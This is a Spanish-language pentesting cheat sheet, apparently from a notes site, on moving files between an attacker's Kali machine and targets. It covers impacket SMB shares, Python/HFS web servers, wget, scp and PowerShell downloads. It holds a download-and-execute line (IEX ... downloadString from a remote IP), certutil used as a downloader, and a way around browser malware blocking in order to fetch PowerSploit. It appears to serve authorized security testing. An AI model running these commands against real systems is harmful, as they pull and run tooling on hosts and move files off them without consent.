Transferencia de ficheros

Servidores temporales

SMB

Se busca el binario de impacket-smbserver:

> locate smbserver

/usr/bin/impacket-smbserver
/usr/lib/python3/dist-packages/impacket/smbserver.py
/usr/lib/python3/dist-packages/impacket/__pycache__/smbserver.cpython-310.pyc
/usr/share/doc/python3-impacket/examples/smbserver.py

Se ejecuta una carpeta compartida vía SMB:

sharedfolder=/tmp/tempserver
mkdir $sharedfolder
cd $sharedfolder
impacket-smbserver share . -smb2support -username xtormin -password xtormin

Se monta la carpeta vía CMD/Powershell:

net use z: \\192.168.1.100\share /user:xtormin xtormin

Se accede a la carpeta compartida y se descargan los ficheros que se quieran:

net use \\<IP de Kali>\share /u:xtormin xtormin
copy file.zip \\<IP de Kali>\share\
del file.zip
net use /d \\<IP de Kali>\share

HTTP

HFS

https://www.rejetto.com/hfs/

Se ejecuta el binario hfs.exe descargado desde la interfaz gráfica y se añaden los ficheros que se deseen exponer en el servidor web.

Python

python3 -m http.server 8000

Descarga de ficheros

Servidores temporales

SMB

Se busca el binario de impacket-smbserver:

> locate smbserver

/usr/bin/impacket-smbserver
/usr/lib/python3/dist-packages/impacket/smbserver.py
/usr/lib/python3/dist-packages/impacket/__pycache__/smbserver.cpython-310.pyc
/usr/share/doc/python3-impacket/examples/smbserver.py

Se sirve una carpeta compartida vía SMB:

sharedfolder=/tmp/tempserver
mkdir $sharedfolder
cd $sharedfolder
impacket-smbserver share . -smb2support -username xtormin -password xtormin

Se monta la carpeta vía CMD/Powershell:

net use z: \\192.168.1.100\share /user:xtormin xtormin

Se accede a la carpeta compartida y se descargan los ficheros que se quieran:

net use \\<IP de Kali>\share /u:xtormin xtormin
copy file.zip \\<IP de Kali>\share\
del file.zip
net use /d \\<IP de Kali>\share

HTTP

HFS

https://www.rejetto.com/hfs/

Se ejecuta el binario hfs.exe descargado desde la interfaz gráfica y se añaden los ficheros que se deseen exponer en el servidor web.

Python

python3 -m http.server 8000

Descarga y subida de ficheros

Linux

wget "https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1"

Windows

iwr https://192.168.1.110/winPEASx64.exe -outputfile winpeas64.exe

IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5:8000/Azure-ADConnect.ps1')

.\certutil.exe -urlcache -split -f "http://legacy.ps1"

SSH

Descarga desde servidor remoto a local:

USER='xtormin'
IP='192.168.1.100'
RUTASRV='C:/Users/xtormin/Documents/<archivo_zip>.zip'
RUTALOCAL='.'
scp $USER@$IP:$RUTASRV $RUTALOCAL

Subida desde local a servidor remoto:

USER='xtormin'
IP='192.168.1.100'
RUTASRV='C:/Users/xtormin/Documents/<archivo_zip>.zip'
RUTALOCAL='.'
scp $RUTALOCAL $USER@$IP:$RUTASRV

Git - Descarga de repositorios

En ocasiones, el navegador puede bloquear la descarga de ficheros que identifica como maliciosos. Una forma de descargarlos cuando es usando Git con su versión portable cuando no se pueda instalar o no se cuente con permisos de administrador local.

Git

https://git-scm.com/download/win/

cd PortableGit-2.46.2-64-bit
.\git-bash.exe

Esto abrirá una consola desde la que se podrá clonar el repositorio:

cd c/Pentest/Tools
git clone https://github.com/PowerShellMafia/PowerSploit.git

Referencias

https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65

AnteriorMisc SiguienteGeneral

Última actualización hace 2 meses

¿Te fue útil?